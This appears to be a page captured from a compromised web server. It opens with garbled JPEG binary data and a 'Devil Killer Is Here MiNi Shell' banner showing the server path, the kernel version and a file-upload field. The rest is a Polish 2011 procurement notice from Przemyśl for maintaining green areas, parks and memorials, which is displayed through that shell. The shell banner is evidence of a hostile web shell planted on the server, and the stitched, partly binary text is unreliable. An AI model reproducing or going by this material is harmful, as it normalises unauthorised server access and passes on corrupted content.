JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111213/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111213/328815-N-2011.html

<p class="kh_header"><b>Przemyśl: Przedmiotem zamówienia jest realizacja usługi utrzymania terenów zielonych na terenie Miasta Przemyśla</b><br>
<b>Numer ogłoszenia: 328815 - 2011; data zamieszczenia: 13.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Przemyśl - Prezydent Miasta Przemyśl , ul. Rynek 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6782962, 6752072, faks 016 6786449.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest realizacja usługi utrzymania terenów zielonych na terenie Miasta Przemyśla.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia:
1) Przedmiotem zamówienia jest realizacja usługi utrzymania terenów zielonych na terenie miasta Przemyśla. Zamówienie będzie realizowane w 8 zakresach.
2) Każdy z Wykonawców winien dokonać wizji lokalnej w terenie, w celu sprawdzenia warunków związanych z wykonaniem usługi stanowiącej przedmiot zamówienia i uzyskania dodatkowych informacji koniecznych do wyceny prac, aby wykluczyć roszczenia Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do zrealizowania przedmiotu zamówienia.
2. Szczegółowy opis przedmiotu zamówienia przedstawiono poniżej:
I. UTRZYMANIE TERENÓW ZIELONYCH W LEWOBRZEŻNEJ CZĘŚCI MIASTA
1. Schody łączące ul. Okrzei i ul. Prądzyńskiego wraz z ciągiem pieszym.
Zakres prac:
- bieżące utrzymanie czystości
- wywóz nieczystości
2. Teren pomiędzy ul. Paderewskiego a Kordiana (część działki Obr. 202, dz. nr 879)
Zakres prac:
- bieżące utrzymanie czystości
- 7-krotne koszenie bez wygrabienia,
- wywóz nieczystości
3. Teren (z chodnikiem i zieleńcem) przyległy do garaży przy ul. Rzecznej i budynku nr 36 przy ul. Jana Pawła II oraz w okolicy budynku przy ul. Wieniawskiego 20,
zieleniec z chodnikiem przy ul. Jana Pawła II, na wysokości Szkoły Podstawowej Nr 16, ul. 22 Stycznia - teren za mostem kolejowym, przylegającym do garaży (Obr. 202, dz. nr 2770, 2772)
Zakres prac:
- bieżące utrzymanie czystości
- wiosenne i jesienne wygrabienie trawników,
- w okresie jesieni, bieżące usuwanie liści z ciągów pieszych,
- 7-krotne koszenie trawników z wygrabieniem trawy, połączone z odchwaszczaniem chodników i krawężników,
- wywóz nieczystości i urobku.
4. Teren przyległy do ul. Grunwaldzkiej na długości od budynku 139a do stacji trafo,
teren między ul. Spiechowicza a Prądzyńskiego, przylegający do ogrodzenia szkoły, 
ul. Bolesława Śmiałego: teren pomiędzy cmentarzem a ogrodzeniem II Liceum Ogólnokształcącego.
Zakres prac:
- bieżące utrzymanie czystości
- wiosenne i jesienne wygrabienie trawników,
- w okresie jesieni, bieżące usuwanie liści z ciągów pieszych,
- 7-krotne koszenie trawników bez wygrabienia trawy
- wywóz nieczystości i urobku.
5. Zieleniec z chodnikiem między ul. Długosza, a Placem Konstytucji 3 Maja - Obr. 205, dz. nr 1742
Zakres prac:
- bieżące utrzymanie czystości 
- wiosenne i jesienne wygrabienie trawników,
- bieżące usuwanie liści z ciągów pieszych,
- 7-krotne koszenie trawników z wygrabieniem trawy, połączone z odchwaszczaniem chodników i  krawężników,
- 3-krotne cięcie żywopłotów połączone z ich odchwaszczeniem,
- wywóz nieczystości i urobku.
6. Teren należący do Gminy Miejskiej Przemyśl (Obr. 202 dz. nr 2624), wzdłuż peronu przy stacji  Przemyśl- Zasanie
Zakres prac:
- bieżące utrzymanie czystości
- 3-krotne wykoszenie bez wygrabienia trawy
- wywóz nieczystości.
7. Teren przy ul. Malawskiego, należący do Gminy Miejskiej Przemyśl, przyległy do parkingu (wzdłuż szańca) i przy dolnej stacji TRAFO
Zakres prac:
- bieżące utrzymanie czystości,
- 3-krotne wykoszenie bez wygrabienia,
- przycinanie krzewów rosnących wzdłuż parkingu w celu umożliwienia bezpiecznego parkowania samochodów oraz wywóz urobku
- wywóz nieczystości
8. ul. Borelowskiego: skarpy po obu stronach przed wjazdem na most,
ul. Brodzińskiego: skarpa na przeciw ZUS i schody do zabudowań przy ul. Chrobrego, wraz z terenem po prawej stronie wejścia na schody (około 0,5 ha), 
ul. Armii Krajowej: teren parkingu i przylegające pobocze na całej długości lasu, na szerokości do 5  m, przy parkingu do 10 m.
ul. Opalińskiego - lewa strona: schody łączące ul. Orkana i Opalińskiego wraz z częścią skarpy należącą do Gminy Miejskiej Przemyśl (Obr. 202, dz. nr 2067)
ul. Opalińskiego - od strony garaży: zieleniec przy zjeździe do garaży po prawej i lewej stronie, skarpa przy garażach wraz ze schodami oraz teren pomiędzy garażami.
ul. Sikorskiego - bpa Glazera: teren przyległy do ogródków działkowych,
ciąg pieszy pomiędzy ul. Zygmuntowską - Wyspiańskiego - Mireckiego
Zakres prac:
- bieżące utrzymanie czystości
- wiosenne i jesienne wygrabienie trawników,
- w okresie jesieni, bieżące usuwanie liści z ciągów pieszych,
- 7-krotne wykoszenie bez wygrabienia trawy
- wywóz nieczystości i urobku.
9. ul. Chrobrego - punkt widokowy z przyległą skarpą oraz terenem poniżej skarpy tj. Obr. 202, dz. nr 1418 i  częścią dz. nr 1528 (razem pow. ok. 14 arów)
Zakres prac:
- bieżące utrzymanie czystości,
- 7-krotne wykoszenie bez wygrabienia trawy,
- wywóz nieczystości i urobku.
10. Obwałowanie przy kościółku na Winnej Górze (ok. 10 arów)
Zakres prac:
- bieżące utrzymanie czystości,
- 4-krotne koszenie bez wygrabienia
- wywóz nieczystości.
11. Teren wzdłuż ul. Krasińskiego o długości ok. 30m, szerokości ok. 5 m od mostu kolejowego do kamiennego gazonu,
trawnik w chodniku przy ul. Malczewskiego, przed bocznym wejściem na teren SP Nr 4.
Zakres prac:
- bieżące utrzymanie czystości,
- 7-krotne koszenie bez wygrabienia,
- 3-krotne cięcie żywopłotu i usuwanie samosiewów i odrostów po ściętych drzewach z wywozem urobku,
- wywóz nieczystości
12. Skrzyżowanie ul. Gurbiela i ul. Krakowskiej
Zakres prac:
- bieżące utrzymanie czystości,
- 7-krotne koszenie bez wygrabienia,
- wywóz nieczystości
13. Utrzymanie w czystości miejsc pamięci narodowej
a)  ul. Monte Cassino - obelisk z okresu II wojny światowej
Zakres prac:
- bieżące utrzymanie czystości,
- wywóz nieczystości,
- usuwanie wypalonych zniczy oraz zeschniętych i zwiędniętych kwiatów.
b) ul. Armii Krajowej - obelisk AK
Zakres prac:
- bieżące utrzymanie czystości,
- 4-krotne koszenie wokół obiektu, z wygrabieniem i usunięciem urobku.
- wiosenne i jesienne wygrabienie trawników,
- bieżące odchwaszczanie chodnika prowadzącego do obelisku i chodnika od strony ul. Armii Krajowej
- wywóz nieczystości i urobku,
- usuwanie wypalonych zniczy oraz zeschniętych i zwiędniętych kwiatów.
c) Pomnik Orląt Przemyskich - łącznie z podstawą z piaskowca (czerwony kopulak)
Zakres prac: 
- bieżące utrzymanie czystości
- wywóz nieczystości
- usuwanie wypalonych zniczy oraz zeschniętych i zwiędniętych kwiatów.
d) Plac Inwalidów Wojennych przy ul. Poniatowskiego
Zakres prac:
- bieżące utrzymanie czystości,
- wiosenne i jesienne wygrabienie trawników,
- bieżące usuwanie liści z ciągów pieszych,
- 7-krotne koszenie trawników z wygrabieniem trawy, połączone z odchwaszczaniem chodników,  krawężników i rabat,
- 3-krotne cięcie żywopłotów połączone z ich odchwaszczeniem,
- wywóz nieczystości i urobku,
- usuwanie wypalonych zniczy oraz zeschniętych i zwiędniętych kwiatów.
e) Tablica pod Mostem Kolejowym im. Porębalskiego,
Zakres prac:
- bieżące utrzymanie czystości chodnika i podpory mostu, na której umieszczona jest tablica,
- usuwanie wypalonych zniczy oraz zeschniętych i zwiędniętych kwiatów,
- wywóz nieczystości.
Na ww. terenach:
- w razie potrzeby, usuwanie dolnych gałęzi drzew,
- usuwanie połamanych przez wiatr i okiść konarów i gałęzi drzew
- obsługa dystrybutorów z torebkami na psie odchody na w/w terenach oraz dodatkowo przy ul. Boruty - Spiechowicza i przy boisku oraz ul. Opalińskiego i na osiedlu Biskupa Glazera (wymiana torebek dostarczonych przez Zamawiającego).
- w okresie zimowym: odśnieżanie (w taki sposób, by nie gromadzić śniegu na nasadzeniach) oraz posypywanie środkami uszorstniającymi Zleceniobiorcy, ciągów pieszych i schodów. 
Bieżące uzupełnianie piasku w skrzyniach reguluje Wykonawca, w porozumieniu 
z dostawcą. 
Do obowiązków Wykonawcy należy również rozstawianie i usuwanie skrzyń na piasek. 
Warunki zimowe nie zwalniają z obowiązku zbierania zanieczyszczeń.
II. UTRZYMANIE TERENÓW ZIELONYCH W PRAWOBRZEŻNEJ CZĘŚCI MIASTA
1. Na skrzyżowaniu ul. Pasteura i Ziemowita - pętla autobusowa z przyległym zieleńcem (os. Zielonka), tereny przed Bramą Forteczną za przekaźnikiem z parkingiem oraz przy ul. Hubala i Piasta Kołodzieja (dawny plac zabaw Obr. 212 dz. nr 795/2), schody i skarpy przy ul. Czachowskiego
Zakres prac:
- bieżące utrzymanie czystości
- 7- krotne koszenie trawników i skarp z wygrabieniem trawy, połączone 
z odchwaszczaniem chodników i krawężników,
- 3 - krotne cięcie żywopłotów połączone z ich odchwaszczaniem,
- wywóz nieczystości i urobku.
2. ul. Katedralna - skarpy przy budynkach nr 3 i 5, 
skarpa przy Klasztorze O.O. Karmelitów, 
zieleniec przed biblioteką przy ul. Słowackiego,
ul. Sportowa - skarpa przy wjeździe od ul. Jagiellońskiej, 
skarpy i schody przed wiaduktem kolejowym 
pas Placu Rotmistrza Witolda Pileckiego Obr. 207 dz. nr 610
ul. Basztowa Obr. 207, dz. nr 951
Zakres prac:
- bieżące utrzymanie czystości 
- wiosenne i jesienne wygrabienie trawników,
- w okresie jesieni, bieżące usuwanie liści z ciągów pieszych,
- 7-krotne koszenie trawników z wygrabieniem trawy, połączone z odchwaszczaniem chodników i krawężników,
- cięcie 3-krotne żywopłotów połączone z ich odchwaszczeniem,
- pielęgnacja hortensji (nawożenie, przycinanie)
- wywóz nieczystości i urobku.
3.   Zieleniec pomiędzy ul. Wodną i Mostową
ul. Chmielna Obr. 207, dz. nr 362.
Zakres prac:
- bieżące utrzymanie czystości
- wiosenne i jesienne wygrabienie trawników,
- w okresie jesieni, bieżące usuwanie liści z ciągów pieszych,
- 7-krotne koszenie trawników z wygrabieniem trawy, połączone z odchwaszczaniem chodników i krawężników,
- cięcie 3-krotne żywopłotów połączone z ich odchwaszczeniem,
- wywóz nieczystości i urobku.
 4. Tereny przed stadionem Polonii, kempingiem (łącznie z częścią dwóch zagajników) - należące do Gminy Miejskiej Przemyśl - ok. 0,16 ha), pas zieleni przy drodze wewnętrznej od strony ogrodzenia Polonii przy drodze wjazdowej do lodowiska, teren przed Bramą Forteczną przy ul. Sanockiej
Zakres prac:
- bieżące utrzymanie czystości 
- wiosenne i jesienne wygrabienie trawników,
- w okresie jesieni, bieżące usuwanie liści z ciągów pieszych,
- 7-krotne koszenie trawników bez wygrabienia trawy, połączone z odchwaszczaniem chodników i krawężników,
- 3-krotne cięcie żywopłotów, połączone z ich odchwaszczeniem,
- wywóz nieczystości i urobku.
5.  Zieleńce przy Galerii Sanowej:
przy ulicach Sanowej i Rzeźniczej po zewnętrznych stronach chodników, 
skarpa od strony ul. Sanowej oraz płaskowiną przed i na skarpie - począwszy od końca ul. Kopernika do końca działki Obr. 208 Nr. 421. (tj. ok. 100m. od ścieżki - będącej przedłużeniem ul. Rzeźniczej - prowadzącej na wał)
Zakres prac:
- bieżące utrzymanie czystości 
- wiosenne i jesienne wygrabienie trawników,
- 7-krotne koszenie trawników bez wygrabienia trawy, 
- wywóz nieczystości i urobku.
6. ul Sobótki (przy kładce - około 5 arów)
Zakres prac:
- 4 - krotne koszenie terenu, bez wygrabienia 
7. teren przy Pl. Legionów prowadzący do zabudowań kościoła Franciszkanów-Reformatów (za kantorem)
Zakres prac:
- bieżące utrzymanie czystości 
- wywóz nieczystości
8. ul. Skolimowska, część należąca do Gminy Miejskiej Przemyśl, prowadząca w kierunku ul. Ofiar Katynia;pobocze drogi wewnętrznej (na szer. do 2 m, po obu stronach) prowadzącej do bazy transportowej Policji (od ul. Żołnierzy I Armii Wojska Polskiego);skrót pieszy pomiędzy ulicami Popiełuszki i Federkiewicza.
Zakres prac:
- bieżące utrzymanie czystości,
- 2-krotne koszenie bez wygrabienia trawy
- wywóz nieczystości
9.  Teren należący do Gminy Miejskiej Przemyśl (Obr. 276, dz. nr 209), w pobliżu betonowego krzyża przy ul. Przekopanej oraz przy ul. Lwowskiej, w pobliżu budynku nr 80 (Obr. 215, dz. nr 33, 890)
Zakres prac:
- 2-krotne koszenie terenu połączone ze zbieraniem i wywiezieniem nagromadzonych  nieczystości bez wygrabienia trawy.
10.  Teren należący do Gminy Miejskiej Przemyśl (Obr. 214, dz. nr 708), przy ul. Jasińskiego
Zakres prac:
- 2-krotne wykoszenie terenu połączone ze zbieraniem i wywiezieniem nagromadzonych  nieczystości bez wygrabienia trawy.
11. Teren przy ul. Szańcowej naprzeciw cerkwi, w przyszłości przeznaczony pod boisko (ok. 30 arów)  i trójkąt w jezdni przed cerkwią (ok. 5 arów)
Zakres prac:
- 2-krotne wykoszenie bez wygrabienia trawy
12. ul. Sielecka - teren po Cerkwii ok. 10 arów
Zakres prac:
- 2-krotne wykoszenie bez wygrabienia trawy
- zamiatanie i odchwaszczanie chodników - interwencyjnie.
13. ul. Wincentego Pola (dz. 470 i 473 Obr. 207)
Zakres prac:
- bieżące utrzymanie czystości 
- wiosenne i jesienne wygrabienie trawników,
- 7-krotne koszenie trawników bez wygrabienia, połączone z odchwaszczaniem chodników i krawężników,
-wywóz nieczystości i urobku.
14. Utrzymanie w czystości Miejsca Pamięci Narodowej
ul. Lwowska - ściana pamięci
Zakres prac:
bieżące utrzymanie czystości,
jednokrotne, jesienne wygrabienie liści,
7 - krotne wykaszanie przyległego terenu zielonego z wygrabieniem,
wywóz nieczystości i urobku
usuwanie wypalonych zniczy oraz zeschniętych i zwiędniętych kwiatów.
15. Pomnik Jana Pawła II (łącznie z podstawą z czerwonego granitu i ścianą z szarego granitu) -  na Placu Niepodległości.
Zakres prac: 
- bieżące utrzymanie czystości
- wywóz nieczystości
- mycie i oliwienie rzeźby
- mycie tacy na znicze.
- usuwanie wypalonych zniczy oraz zeschniętych i zwiędniętych kwiatów.
Na ww. terenach (poza punktem 5 tj. poza terenem przy Galerii Sanowej):
- w razie potrzeby, usuwanie dolnych gałęzi drzew,
- usuwanie połamanych przez wiatr i okiść konarów i gałęzi drzew
- obsługa dystrybutorów z torebkami na psie odchody (wymiana torebek dostarczonych przez Zamawiającego)
- W okresie zimowym: odśnieżanie (w taki sposób, by nie gromadzić śniegu na nasadzeniach) oraz posypywanie środkami uszorstniającymi Zleceniobiorcy, ciągów pieszych i schodów. 
Bieżące uzupełnianie piasku w skrzyniach reguluje Wykonawca, w porozumieniu  dostawcą.
Do obowiązków Wykonawcy należy również rozstawianie i usuwanie skrzyń na piasek.
Warunki zimowe nie zwalniają z obowiązku zbierania zanieczyszczeń.
III. UTRZYMANIE PARKU MIEJSKIEGO: 
Teren działania: jak w załączniku graficznym
Zakres prac:
1. Teren, w załączniku graficznym zaznaczony kolorem niebieskim:
Bieżące usuwanie (zbieranie) i usunięcie nieczystości z całości Parku, łącznie z terenem Trzech Krzyży i Wzgórzem Zamkowym (ze schodami i skarpą).
2. Na terenach zaznaczonych w załączniku graficznym kolorem różowym, dodatkowo:
a) zamiatanie alejek i schodów
b) bieżące podmiatanie miejsc najczęściej zaśmiecanych,
c) bieżące opróżnianie koszy i usunięcie nieczystości.
d) wywóz urobku
3. Koszenie trawników
a) 7 - krotne, z wygrabieniem trawy:
teren Wzgórza Zamkowego (płaskowina), place zabaw z najbliższym otoczeniem, tereny przy pomnikach, przed oranżerią, przy fontannie i krąg za ciekiem wodnym
b) 5 - krotne, bez wygrabienia trawy skarp przy Wzgórzu Zamkowym
c) 2-krotne, bez wygrabienia trawy
 teren, w załączniku graficznym zaznaczony kolorem różowym
d) jednokrotne, bez wygrabienia trawy:
teren, w załączniku graficznym zaznaczony kolorem żółtym
e) w trakcie koszenia wycinanie samosiewów i dzikich odrostów.
4. Wygrabienie liści wiosną i jesienią:
z alejek i ich poboczy (do 2 m),
z terenów przy pomnikach,
z terenu przed oranżerią,
z płaskowiny Wzgórza Zamkowego,  
bieżące: z placów zabaw - codzienne (w sezonie) wygrabianie piasku z wybraniem nieczystości do godz. 900
5. 3 - krotne cięcie żywopłotów, połączone z ich odchwaszczeniem.
6. Inne prace:
a) obsługa dystrybutorów z torebkami na psie odchody (wymiana torebek dostarczonych przez Zamawiającego)
b) usuwanie wybijających odrostów i młodych samosiewów drzew i krzewów,
c)utrzymanie alejek (zbieranie nieczystości, zamiatanie, odchwaszczanie - w razie potrzeby),
d) każdorazowe zgłaszanie Zleceniodawcy, wypłukanie nawierzchni nowych alejek z materiału Hanse Grand,
e) stała pielęgnacja rabat bylinowych,
f) utrzymanie w odpowiednim stanie, progów zwalniających przepływ wody,
g) odmulanie alejek i istniejących cieków wodnych oraz urządzeń odwadniających,
h) oczyszczanie studzienki przed stawem parkowym,
i) bieżące usuwanie wrzucanych do stawu i utrzymujących się na powierzchni wody śmieci,
j) bieżące usuwanie zanieczyszczeń z fontanny, 
k) uruchamianie fontanny, konserwacja i udrażnianie przewodów wodno - kanalizacyjnych,
l) bieżące usuwanie wiatrołomów (gałęzi, konarów i powalonych na ziemię drzew), których usunięcie nie wymaga użycia podnośnika, lin.
Wyłącza się przypadki masowego wystąpienia w/w sytuacji.
m) usuwanie karpin po wykrotach - do 5 sztuk.	
n) bieżący przegląd urządzeń zabawowych, 
o)zgłaszanie Zleceniodawcy poważnych usterek i zagrożeń 
p) zgłaszanie organom ścigania z powiadomieniem Zleceniodawcy, o zaistniałych faktach wandalizmu i dewastacjach.
q) naprawa drobnych uszkodzeń i konserwacja urządzeń małej architektury, 
r)wymiana piasku w piaskownicach,
s)  mycie ławek (w razie potrzeby)
t)w okresie zimowym:
przy dużych opadach śniegu odśnieżanie głównych alejek (jak w załączniku graficznym), umożliwiające swobodne przejście, 
oczyszczanie ze śniegu i oblodzenia wszystkich schodów
posypywanie środkami uszorstniającymi Zleceniobiorcy, schodów, stromych podejść i zejść na w/w terenach. 
7. Bieżące uzupełnianie piasku w skrzyniach reguluje Wykonawca, w porozumieniu z dostawcą.
8. Zakres prac polega na bieżącym i okresowym wykonaniu robót, niezbędnych do utrzymania obiektów i urządzeń w należytym stanie technicznym. Obejmuje likwidację przyczyn i skutków uszkodzeń oraz natychmiastowe usuwanie stanów mogących stanowić zagrożenie dla użytkowników.
9. Na terenie Wzgórza Zamkowego znajduje się  8 szt. ławek, 10 szt. koszy na śmieci oraz nowa ścieżka z płyt kamiennych o pow. 661,8m2. Na terenie parku znajduje się 140 szt. ławek, 60 szt. koszy na śmieci oraz nowe ścieżki: z warstwą żwirową (HanseGrand) - 3.691 m2, z kostki kamiennej granitowej i porfirowej - 5.177 m2, z płyt kamiennych 289 m2, żwirowo - tłuczniowe - 2.742 m2, żwirowo - tłuczniowe z obrzeżami kamiennymi - 591 m2, z łupka - 94 m2, z płyt granitowych - 47 m2.
IV. UTRZYMANIE TERENU REKREACYJNEGO NA ZNIESIENIU I KOPCU TATARSKIM WRAZ Z ISTNIEJĄCYMI OBIEKTAMI
1. Teren działania: teren rekreacyjny =  13,30 ha 
- jak w załączniku graficznym
2. Zakres prac:
a) codzienne sprzątanie terenu i istniejących obiektów w dni robocze, w niedziele i święta (z wyjątkiem Świąt Bożego Narodzenia i Wielkanocy),
b) bieżące zamiatanie alejek brukowych i schodów, amfiteatru, posadzki wiaty i parkingów,
c) bieżące oczyszczanie fortów ze śmieci i fekalii,
d) 6-krotne koszenie z wygrabieniem i usunięciem urobku; terenów skarp przy ciągach pieszych, przy pomniku Krzyża Zawierzenia (od przekaźnika po górne parkingi), wokół istniejących nasadzeń roślin ozdobnych, parkingach oraz boisko i przyległy do niego teren - w terminach określonych przez Zleceniodawcę.
e) 2-krotne koszenie pozostałych części terenu, w miejscach dostępnych do koszenia - w terminach określonych przez Zleceniodawcę.
f) W trakcie koszenia wycinanie samosiewów i dzikich odrostów.
g) bieżące usuwanie chwastów z alejek żwirowych i brukowych z usunięciem urobku.
h) mycie ławek zlokalizowanych na całym terenie (37 szt. z oparciem i 4 bez oparcia) i siedzisk granitowych w amfiteatrze (w razie potrzeby),
i) bieżące opróżnianie koszy (37 szt.) i mycie ich w razie potrzeby 
j) obsługa dystrybutorów z torebkami na psie odchody (wymiana torebek dostarczonych przez Zamawiającego)
k) dokonywanie napraw zniszczonego sprzętu oraz obiektów (na podstawie przedłożonej kalkulacji zatwierdzonej przez Zamawiającego, wg nośników cenotwórczych podanych w ofercie), maksymalnie do wysokości 50.000,00 brutto
l) natychmiastowe usuwanie powstałych zagrożeń dla użytkowników.
m) niezwłoczne zgłaszanie organom ścigania z powiadomieniem Zleceniodawcy, o zaistniałych faktach wandalizmu i dewastacjach.
n) bieżące usuwanie wypalonych zniczy i zwiędniętych kwiatów spod pomnika Krzyża Zawierzenia.
o) uzupełnienie korowania przy istniejących nasadzeniach.
p) odmulanie wodocieków.
q) pielęgnacja nasadzeń roślin ozdobnych (bieżące odchwaszczanie, nawożenie, podlewanie i uzupełnianie korowania),
r) Zakup, posadzenie w miejsce uschniętych nasadzeń i pielęgnacja (bieżące odchwaszczanie, nawożenie, podlewanie i uzupełnianie korowania) n/w drzew i krzewów:
- świerk kłujący - wys. min. 1 m. - 4 szt. (sadzonki minimum 2 letnie)
- berberys purpurowy - 20 szt. (sadzonki minimum 2 letnie)
- jałowiec rozesłany Nana- 30 szt. (sadzonki minimum 2 letnie)
- tawuła Golden- 10 szt. (sadzonki minimum 2 letnie)
- 4 szt. dębów czerwonych o wys. min. 4 m (w miejsce uschniętych, przy tabliczkach ofiar katyńskich).
s) dwukrotne koszenie terenu przy ul. Grochowskiej, na długości ok. 450 m. (teren wolny od zakrzaczeń) bez wygrabienia urobku (terminy koszeń ustali Zleceniodawca). W trakcie koszenia wycinanie samosiewów i dzikich odrostów.
t) podcinanie gałęzi wierzb rosnących przy parkingu, na terenie Zniesienia, w celu umożliwienia swobodnego przejścia, przejazdu samochodów i autokarów,
u) usuwanie z terenu połamanych przez wiatr i okiść konarów i gałęzi drzew
v) wycięcie zakrzaczeń głogów (z pominięciem większych samosiewów głogu oraz tarniny) na terenie Zniesienia, od strony ul. Grochowskiej (Obr. 212 dz. 622). - na pow. ok. 3.000 m2
3. Zimowe utrzymanie terenu (warunki zimowe nie zwalniają z obowiązku zbierania zanieczyszczeń).
a) przy dużych opadach śniegu odśnieżanie parkingów i głównych alejek, umożliwiające swobodne przejście.
b) oczyszczanie ze śniegu i oblodzenia wszystkich schodów.
c) posypywanie środkami uszorstniającymi: schodów, stromych podejść i zejść na ww. terenach oraz ciągów pieszych i schodów przy Krzyżu Zawierzenia, materiałami Zleceniobiorcy.
V. UKWIECANIE MIASTA
1. Zakres prac:
1. przekopanie, uzupełnienie ziemi, nawożenie przed sadzeniem,
